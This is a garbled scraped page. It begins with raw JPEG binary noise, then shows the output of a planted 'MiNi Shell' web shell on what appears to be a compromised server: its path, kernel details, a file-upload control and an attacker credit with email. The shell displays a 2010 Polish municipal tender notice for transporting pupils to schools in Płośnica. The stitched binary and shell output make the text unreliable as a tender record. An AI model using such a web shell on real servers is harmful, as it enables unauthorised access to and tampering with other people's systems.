JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100817/253472-N-2010.html

<p class="kh_header"><b>Płośnica: USŁUGA DOWOZU UCZNIÓW DO SZKÓŁ PODSTAWOWYCH NA TERENIE GMINY PŁOŚNICA W ROKU SZKOLNYM 2010/2011</b><br>
<b>Numer ogłoszenia: 253472 - 2010; data zamieszczenia: 17.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Płośnica , ul. Dworcowa 52, 13-206 Płośnica, woj. warmińsko-mazurskie, tel. 023 6968008, faks 023 6968005.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA DOWOZU UCZNIÓW DO SZKÓŁ PODSTAWOWYCH NA TERENIE GMINY PŁOŚNICA W ROKU SZKOLNYM 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Określenie szczegółowego przedmiotu zamówienia: 
1.1.	Zamówienie obejmować będzie dowóz uczniów  w roku szkolnym 2010/2011 do następujących szkół: 
1.1.1.	Szkoły Podstawowej w Płośnicy, uczniowie z miejscowości:  Rutkowice, Skurpie ,  Turza Mała, Gralewo;
1.1.2.	Szkoły Podstawowej  w Wielkim Łęcku, uczniowie z miejscowości:  Mały Łęck
1.1.3.	Szkoły Podstawowej w Gródkach, uczniowie z miejscowości:  Przełęk Duży, Przełęk Mały, Przełęk Kościelny. 
1.2.	Usługa realizowana będzie na ustalonych stałych trasach i polegała będzie na  dowozie uczniów z miejsca zamieszkania do szkoły oraz odwozie  po skończonych zajęciach lekcyjnych ze szkoły do miejsca zamieszkania, a w razie potrzeby obejmować będzie dowóz okazjonalny uczniów (np. wyjazdy na wycieczki, zawody sportowe itp.) 
1.3.	Zamówienie realizowane będzie w dni nauki szkolnej, a w razie potrzeby także w inne dni ustalone przez Zamawiającego.
1.4.	 Zamawiający ustala górny limit zamówienia  do wysokości 22 565 km na który złożą się kilometry wynikające z  codziennych tras dowozu w ilości 21 065 km i z wyjazdów dodatkowych i zastępczych w ilości   1 500 km. 
1.5.	 W przypadku gdy górny limit kilometrów określony dla przedmiotu zamówienia zostanie przekroczony, z przyczyn określonych w pkt 2, Zamawiający udzieli zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt 6 ustawy PZP.
1.6.	W przypadku gdy górny limit kilometrów określony dla przedmiotu zamówienia nie zostanie osiągnięty w okresie jego realizacji, zamówienie zostanie zrealizowane do wysokości rzeczywiście wykonanych kilometrów.
1.7.	 Szczegółowy zakres zamówienia określa  Załącznik nr 1 SIWZ-  Zestawienie tras dowozu.
2.	Ilość tras jaki i ich długość może ulec zmianie w przypadku:
2.1.	Likwidacji szkoły lub założenia szkoły.
2.2.	 Jeżeli zmieni się ilość dzieci zamieszkałych w obrębie danej trasy dowozu.
2.3.	Ze względu zmiany miejsca zamieszkania uczniów.
2.4.	Reorganizacji sieci  szkół.
2.5.	Zmiany obwodu szkół (szkoły)
2.6.	 Zmiany art. 17 ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256 poz. 2572 z późn. zm);
2.7.	Zmiany organizacji roku szkolnego (wynikającej z arkusza organizacyjnego szkół - szkoły)
2.8.	Zmiany planu nauczania w szkołach (szkole) w poszczególnych dniach tygodnia, których zamawiający nie może przewidzieć.
2.9.	 Zmiany ilości dzieci dowożonych na danej trasie przejazdu autobusów
2.10.	 Z innych przyczyn, których nie można było przewidzieć w momencie podpisania umowy a w szczególności awarii gminnych pojazdów dowożących uczniów: gimbusa czy autobusu do przewozu uczniów niepełnosprawnych, gdzie Zamawiający powierzy Wykonawcy świadczenie dowozu w ramach pojazdów zastępczych do czasu usunięcia awarii pojazdów gminnych.
2.11.	Zmiany ilości dzieci dowożonych na danej trasie przejazdu autokarów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający udzieli zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt 6 ustawy PZP W przypadku gdy górny limit kilometrów określony dla przedmiotu zamówienia zostanie przekroczony, z przyczyn określonych poniżej: 
1.	Likwidacji szkoły lub założenia szkoły.
2.	Jeżeli zmieni się ilość dzieci zamieszkałych w obrębie danej trasy dowozu.
3.	Ze względu zmiany miejsca zamieszkania uczniów.
4.	Reorganizacji sieci  szkół.
5.	Zmiany obwodu szkół (szkoły)
6.	Zmiany art. 17 ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256 poz. 2572 z późn. zm);
7.	Zmiany organizacji roku szkolnego (wynikającej z arkusza organizacyjnego szkół - szkoły)
8.	Zmiany planu nauczania w szkołach (szkole) w poszczególnych dniach tygodnia, których zamawiający nie może przewidzieć.
9.	Zmiany ilości dzieci dowożonych na danej trasie przejazdu autobusów
10.	Z innych przyczyn, których nie można było przewidzieć w momencie podpisania umowy a w szczególności awarii gminnych pojazdów dowożących uczniów: gimbusa czy autobusu do przewozu uczniów niepełnosprawnych, gdzie Zamawiający powierzy Wykonawcy świadczenie dowozu w ramach pojazdów zastępczych do czasu usunięcia awarii pojazdów gminnych.
11.	Zmiany ilości dzieci dowożonych na danej trasie przejazdu autobusów.

Zamawiający udzieli zamówienia uzupełniającego do wysokości 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymaga się wadium w wysokości 2 000 zł (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że Wykonawca posiada uprawnienia do wykonywania określonej działalności jeżeli:
a) Oświadczy i udokumentuje posiadanie uprawnień do wykonywania działalności.
b)  Posiada licencję na wykonywanie krajowego transportu drogowego osób.
2. Warunek ten zostanie oceniony na podstawie załączonych przez Wykonawcę dokumentów: oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt 8.1.1 SIWZ oraz dokumentów określonych w pkt 8.2.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie umożliwiającą realizację zamówienia, jeżeli:
a) Oświadczy, że posiada niezbędną wiedzę i doświadczenie  umożliwiające realizację zamówienia
2. Warunek ten zostanie oceniony na podstawie załączonych przez Wykonawcę dokumentów: oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt 8.1.1, a w przypadku gdy Wykonawca korzystał będzie z wiedzy i doświadczenia innych podmiotów także dokumentu określonego w pkt 8.7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że Wykonawca dysponuje odpowiednim potencjałem technicznym jeżeli:
a) oświadczy, że dysponuje odpowiednim potencjałem
b) Wykaże i udokumentuje dysponowanie minimum dwoma pojazdami dopuszczonymi do ruchu drogowego z ważnym badaniem technicznym:
Autobusem o liczbie minimum 35 miejsc.
Autobusem o liczbie minimum 17 miejsc.
2. Warunek ten zostanie oceniony na podstawie załączonych przez Wykonawcę dokumentów: oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt 8.1.1 SIWZ oraz dokumentów określonych w pkt 8.4.1 i 8.4.3 SIWZ a w przypadku gdy Wykonawca polegał będzie na potencjale technicznym innych podmiotów także dokumentu określonego w pkt 8.7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 Zamawiający uzna, że Wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia jeżeli:
a) Oświadczy że dysponuje osobami zdolnymi do wykonania zamówienia
b) Wykaże i udokumentuje dysponowanie osobami zdolnymi do wykonania zamówienia:
Kierowcami (min 2 osoby) posiadającymi prawo jazdy kategorii D oraz uprawnienia do przewozu osób.
2. Warunek ten zostanie oceniony na podstawie załączonych przez Wykonawcę dokumentów: oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt 8.1.1 SIWZ oraz dokumentów określonych w pkt 8.5.1 SIWZ a w przypadku gdy Wykonawca polegał będzie na potencjale technicznym innych podmiotów także dokumentu określonego w pkt 8.7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej realizację zamówienia jeżeli:
a) Oświadczy, że znajduje się w sytuacji ekonomicznej umożliwiającej realizację zamówienia.
2. Warunek ten zostanie oceniony na podstawie załączonych przez Wykonawcę dokumentów: oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w pkt 8.1.1 SIWZ, a w przypadku gdy Wykonawca polegał będzie na sytuacji finansowej innych podmiotów także dokumentu określonego w pkt 8.7.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Kserokopie dowodów rejestracyjnych z aktualnym badaniem technicznym pojazdów wykazanych do realizacji zamówienia,
2. Kserokopie prawa jazdy oraz uprawnień do przewozu osób kierowców wykazanych do realizacji zamówienia,
3. Dokument poświadczający dysponowanie pojazdami wykazanymi do realizacji zamówienia jeżeli wykonawca nie jest właścicielem pojazdów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w przypadku gdy upoważnienie do reprezentacji nie wynika z dokumentu rejestrowego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmian tras dowozu i ich długości, z przyczyn:
a)	Likwidacji szkoły
b)	Jeżeli zmieni się ilość dzieci zamieszkałych w obrębie danej trasy dowozu.
c)	Ze względu zmiany miejsca zamieszkania uczniów.
d)	Reorganizacji sieci  szkół.
e)	Zmiany obwodu szkół (szkoły)
f)	Zmiany art. 17 ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256 poz. 2572 z późn. zm);
g)	Zmiany organizacji roku szkolnego (wynikającej z arkusza organizacyjnego szkół - szkoły)
h)	Zmiany planu nauczania w szkołach (szkole) w poszczególnych dniach tygodnia, których zamawiający nie może przewidzieć.
i)	Zmiany ilości dzieci dowożonych na danej trasie przejazdu autobusów
j)	Z innych nieprzewidzianych przyczyn, których nie można było przewidzieć w momencie podpisania umowy a w szczególności awarii gminnego gimbusa czy autobusu do przewozu uczniów niepełnosprawnych, gdzie Zamawiający powierzy Wykonawcy świadczenie dowozu w ramach pojazdów zastępczych do czasu usunięcia awarii pojazdów gminnych.
2. Zmian kierowców i pojazdów do realizacji zamówienia pod warunkiem zaistnienia uzasadnionych przyczyn, których Zamawiający nie mógł przewidzieć na etapie podpisywania umowy oraz pod warunkiem, że Wykonawca spełni wymagania co do kierowców i pojazdów określone w SIWZ.
3. Ustawowej zmiany stawki podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.plosnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Płośnicy
13-200 Płośnica
ul. Dworcowa 52.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2010 godzina 10:00, miejsce: Urząd Gminy w Płośnicy
13-200 Płośnica
ul. Dworcowa 52
Sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 23.09.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com